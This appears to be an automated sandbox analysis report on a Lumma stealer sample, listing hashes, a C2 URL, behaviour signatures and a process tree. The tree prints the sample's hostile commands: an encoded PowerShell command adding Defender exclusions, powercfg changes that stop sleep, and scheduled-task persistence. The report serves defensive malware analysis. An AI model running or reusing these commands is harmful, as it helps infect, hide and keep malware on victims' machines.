Analysis
-
max time kernel
210s -
max time network
213s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
06-07-2024 20:29
Static task
static1
General
-
Target
-
Size
113.1MB
-
MD5
2e3e5073d22bbcd2f2b0bfea40c95f29
-
SHA1
acc3917dd7d803e68475c966064bf60177934c78
-
SHA256
c3030eb910a9a625cd7ccfb58c831efe98db82b6e20e294d101345c24c162a2e
-
SHA512
bd8532d16d5e32763ae6e9f4aa1a3676226682edfab7b5a1efd132f5f76ce14a6bdf061271e02681818e1d55c1791e9e613677d6648075d1af61b51a4f5176e3
-
SSDEEP
98304:jzGfaIjrga+OQlJMHIu5LKoo2A5FEtHU53KW1avHpgAE6H3ei3AaUi:QjP+OQlmyEUJ1avHe56XLAaU
Malware Config
Extracted
lumma
https://answerrsdo.shop/api
Signatures
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
8CSO1S7HME9QSJ9OS.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\International\Geo\Nation 8CSO1S7HME9QSJ9OS.exe -
Executes dropped EXE 9 IoCs
Processes:
8CSO1S7HME9QSJ9OS.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exeInstaller.exepid process 4980 8CSO1S7HME9QSJ9OS.exe 1576 7z.exe 5004 7z.exe 5044 7z.exe 4364 7z.exe 4140 7z.exe 3184 7z.exe 2616 7z.exe 2068 Installer.exe -
Loads dropped DLL 7 IoCs
Processes:
7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exepid process 1576 7z.exe 5004 7z.exe 5044 7z.exe 4364 7z.exe 4140 7z.exe 3184 7z.exe 2616 7z.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Power Settings 1 TTPs 6 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.execmd.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepid process 1712 powercfg.exe 5012 cmd.exe 2928 powercfg.exe 2960 powercfg.exe 1428 powercfg.exe 1448 powercfg.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
description pid process target process PID 1032 set thread context of 2028 1032 [email protected] BitLockerToGo.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 3 IoCs
Processes:
msedge.exemsedge.exeOpenWith.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2480455240-981575606-1030659066-1000\{A6B388ED-B9D8-49D1-8E12-343D8F3C4C19} msedge.exe Key created \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000_Classes\Local Settings OpenWith.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 636 schtasks.exe 5080 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 27 IoCs
Processes:
BitLockerToGo.exeInstaller.exepowershell.exemsedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exepid process 2028 BitLockerToGo.exe 2028 BitLockerToGo.exe 2028 BitLockerToGo.exe 2028 BitLockerToGo.exe 2068 Installer.exe 2200 powershell.exe 2200 powershell.exe 2068 Installer.exe 2068 Installer.exe 2068 Installer.exe 2068 Installer.exe 2068 Installer.exe 2068 Installer.exe 2056 msedge.exe 2056 msedge.exe 3784 msedge.exe 3784 msedge.exe 3536 identity_helper.exe 3536 identity_helper.exe 1440 msedge.exe 1440 msedge.exe 2168 msedge.exe 2168 msedge.exe 2168 msedge.exe 2168 msedge.exe 4404 msedge.exe 4404 msedge.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
OpenWith.exepid process 5356 OpenWith.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 29 IoCs
Processes:
msedge.exepid process 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
Processes:
[email protected]7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exeInstaller.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeAUDIODG.EXEdescription pid process Token: SeDebugPrivilege 1032 [email protected] Token: SeRestorePrivilege 1576 7z.exe Token: 35 1576 7z.exe Token: SeSecurityPrivilege 1576 7z.exe Token: SeSecurityPrivilege 1576 7z.exe Token: SeRestorePrivilege 5004 7z.exe Token: 35 5004 7z.exe Token: SeSecurityPrivilege 5004 7z.exe Token: SeSecurityPrivilege 5004 7z.exe Token: SeRestorePrivilege 5044 7z.exe Token: 35 5044 7z.exe Token: SeSecurityPrivilege 5044 7z.exe Token: SeSecurityPrivilege 5044 7z.exe Token: SeRestorePrivilege 4364 7z.exe Token: 35 4364 7z.exe Token: SeSecurityPrivilege 4364 7z.exe Token: SeSecurityPrivilege 4364 7z.exe Token: SeRestorePrivilege 4140 7z.exe Token: 35 4140 7z.exe Token: SeSecurityPrivilege 4140 7z.exe Token: SeSecurityPrivilege 4140 7z.exe Token: SeRestorePrivilege 3184 7z.exe Token: 35 3184 7z.exe Token: SeSecurityPrivilege 3184 7z.exe Token: SeSecurityPrivilege 3184 7z.exe Token: SeRestorePrivilege 2616 7z.exe Token: 35 2616 7z.exe Token: SeSecurityPrivilege 2616 7z.exe Token: SeSecurityPrivilege 2616 7z.exe Token: SeDebugPrivilege 2068 Installer.exe Token: SeDebugPrivilege 2200 powershell.exe Token: SeShutdownPrivilege 2928 powercfg.exe Token: SeCreatePagefilePrivilege 2928 powercfg.exe Token: SeShutdownPrivilege 2960 powercfg.exe Token: SeCreatePagefilePrivilege 2960 powercfg.exe Token: SeShutdownPrivilege 1428 powercfg.exe Token: SeCreatePagefilePrivilege 1428 powercfg.exe Token: SeShutdownPrivilege 1448 powercfg.exe Token: SeCreatePagefilePrivilege 1448 powercfg.exe Token: SeShutdownPrivilege 1712 powercfg.exe Token: SeCreatePagefilePrivilege 1712 powercfg.exe Token: SeShutdownPrivilege 1712 powercfg.exe Token: SeCreatePagefilePrivilege 1712 powercfg.exe Token: 33 384 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 384 AUDIODG.EXE -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exepid process 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe -
Suspicious use of SendNotifyMessage 26 IoCs
Processes:
msedge.exepid process 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe 3784 msedge.exe -
Suspicious use of SetWindowsHookEx 15 IoCs
Processes:
OpenWith.exepid process 5356 OpenWith.exe 5356 OpenWith.exe 5356 OpenWith.exe 5356 OpenWith.exe 5356 OpenWith.exe 5356 OpenWith.exe 5356 OpenWith.exe 5356 OpenWith.exe 5356 OpenWith.exe 5356 OpenWith.exe 5356 OpenWith.exe 5356 OpenWith.exe 5356 OpenWith.exe 5356 OpenWith.exe 5356 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description pid process target process PID 1032 wrote to memory of 2028 1032 [email protected] BitLockerToGo.exe PID 1032 wrote to memory of 2028 1032 [email protected] BitLockerToGo.exe PID 1032 wrote to memory of 2028 1032 [email protected] BitLockerToGo.exe PID 1032 wrote to memory of 2028 1032 [email protected] BitLockerToGo.exe PID 1032 wrote to memory of 2028 1032 [email protected] BitLockerToGo.exe PID 2028 wrote to memory of 4980 2028 BitLockerToGo.exe 8CSO1S7HME9QSJ9OS.exe PID 2028 wrote to memory of 4980 2028 BitLockerToGo.exe 8CSO1S7HME9QSJ9OS.exe PID 2028 wrote to memory of 4980 2028 BitLockerToGo.exe 8CSO1S7HME9QSJ9OS.exe PID 4980 wrote to memory of 3320 4980 8CSO1S7HME9QSJ9OS.exe cmd.exe PID 4980 wrote to memory of 3320 4980 8CSO1S7HME9QSJ9OS.exe cmd.exe PID 3320 wrote to memory of 3636 3320 cmd.exe mode.com PID 3320 wrote to memory of 3636 3320 cmd.exe mode.com PID 3320 wrote to memory of 1576 3320 cmd.exe 7z.exe PID 3320 wrote to memory of 1576 3320 cmd.exe 7z.exe PID 3320 wrote to memory of 5004 3320 cmd.exe 7z.exe PID 3320 wrote to memory of 5004 3320 cmd.exe 7z.exe PID 3320 wrote to memory of 5044 3320 cmd.exe 7z.exe PID 3320 wrote to memory of 5044 3320 cmd.exe 7z.exe PID 3320 wrote to memory of 4364 3320 cmd.exe 7z.exe PID 3320 wrote to memory of 4364 3320 cmd.exe 7z.exe PID 3320 wrote to memory of 4140 3320 cmd.exe 7z.exe PID 3320 wrote to memory of 4140 3320 cmd.exe 7z.exe PID 3320 wrote to memory of 3184 3320 cmd.exe 7z.exe PID 3320 wrote to memory of 3184 3320 cmd.exe 7z.exe PID 3320 wrote to memory of 2616 3320 cmd.exe 7z.exe PID 3320 wrote to memory of 2616 3320 cmd.exe 7z.exe PID 3320 wrote to memory of 5116 3320 cmd.exe attrib.exe PID 3320 wrote to memory of 5116 3320 cmd.exe attrib.exe PID 3320 wrote to memory of 2068 3320 cmd.exe Installer.exe PID 3320 wrote to memory of 2068 3320 cmd.exe Installer.exe PID 3320 wrote to memory of 2068 3320 cmd.exe Installer.exe PID 2068 wrote to memory of 5012 2068 Installer.exe cmd.exe PID 2068 wrote to memory of 5012 2068 Installer.exe cmd.exe PID 2068 wrote to memory of 5012 2068 Installer.exe cmd.exe PID 5012 wrote to memory of 2200 5012 cmd.exe powershell.exe PID 5012 wrote to memory of 2200 5012 cmd.exe powershell.exe PID 5012 wrote to memory of 2200 5012 cmd.exe powershell.exe PID 2068 wrote to memory of 1332 2068 Installer.exe cmd.exe PID 2068 wrote to memory of 1332 2068 Installer.exe cmd.exe PID 2068 wrote to memory of 1332 2068 Installer.exe cmd.exe PID 2068 wrote to memory of 3280 2068 Installer.exe cmd.exe PID 2068 wrote to memory of 3280 2068 Installer.exe cmd.exe PID 2068 wrote to memory of 3280 2068 Installer.exe cmd.exe PID 5012 wrote to memory of 2928 5012 cmd.exe powercfg.exe PID 5012 wrote to memory of 2928 5012 cmd.exe powercfg.exe PID 5012 wrote to memory of 2928 5012 cmd.exe powercfg.exe PID 1332 wrote to memory of 636 1332 cmd.exe schtasks.exe PID 1332 wrote to memory of 636 1332 cmd.exe schtasks.exe PID 1332 wrote to memory of 636 1332 cmd.exe schtasks.exe PID 3280 wrote to memory of 5080 3280 cmd.exe schtasks.exe PID 3280 wrote to memory of 5080 3280 cmd.exe schtasks.exe PID 3280 wrote to memory of 5080 3280 cmd.exe schtasks.exe PID 5012 wrote to memory of 2960 5012 cmd.exe powercfg.exe PID 5012 wrote to memory of 2960 5012 cmd.exe powercfg.exe PID 5012 wrote to memory of 2960 5012 cmd.exe powercfg.exe PID 5012 wrote to memory of 1428 5012 cmd.exe powercfg.exe PID 5012 wrote to memory of 1428 5012 cmd.exe powercfg.exe PID 5012 wrote to memory of 1428 5012 cmd.exe powercfg.exe PID 5012 wrote to memory of 1448 5012 cmd.exe powercfg.exe PID 5012 wrote to memory of 1448 5012 cmd.exe powercfg.exe PID 5012 wrote to memory of 1448 5012 cmd.exe powercfg.exe PID 5012 wrote to memory of 1712 5012 cmd.exe powercfg.exe PID 5012 wrote to memory of 1712 5012 cmd.exe powercfg.exe PID 5012 wrote to memory of 1712 5012 cmd.exe powercfg.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\[email protected]"C:\Users\Admin\AppData\Local\Temp\[email protected]"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Users\Admin\AppData\Local\Temp\8CSO1S7HME9QSJ9OS.exe"C:\Users\Admin\AppData\Local\Temp\8CSO1S7HME9QSJ9OS.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4980 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"4⤵
- Suspicious use of WriteProcessMemory
PID:3320 -
C:\Windows\system32\mode.commode 65,105⤵PID:3636
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p1404753551733818025492326517 -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_6.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5004
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_5.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5044
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_4.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4364
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_3.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4140
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3184
-
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
-
C:\Windows\system32\attrib.exeattrib +H "Installer.exe"5⤵
- Views/modifies file attributes
PID:5116
-
-
C:\Users\Admin\AppData\Local\Temp\main\Installer.exe"Installer.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAEsANgBXADMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBMAG8ATwAwAE4ASgBKACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFoAUgBmADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbgBWAEgAVQAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off6⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAEsANgBXADMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBMAG8ATwAwAE4ASgBKACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFoAUgBmADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbgBWAEgAVQAjAD4A"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2200
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /x -hibernate-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /x -hibernate-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /x -standby-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1428
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /x -standby-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1448
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /hibernate off7⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1712
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Scheduled Task/Job: Scheduled Task
PID:636
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3131" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
- Suspicious use of WriteProcessMemory
PID:3280 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3131" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Scheduled Task/Job: Scheduled Task
PID:5080
-
-
-
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4828
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3784 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe38b746f8,0x7ffe38b74708,0x7ffe38b747182⤵PID:2500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:22⤵PID:3736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:82⤵PID:4120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:12⤵PID:3884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:12⤵PID:916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:12⤵PID:2960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:12⤵PID:2936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5476 /prefetch:82⤵PID:2828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5476 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:12⤵PID:1960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:12⤵PID:5000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5248 /prefetch:82⤵PID:1664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4024 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:12⤵PID:1980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4136 /prefetch:12⤵PID:3572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3134575422011046465,17816465061719523687,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:12⤵PID:4744
-
-
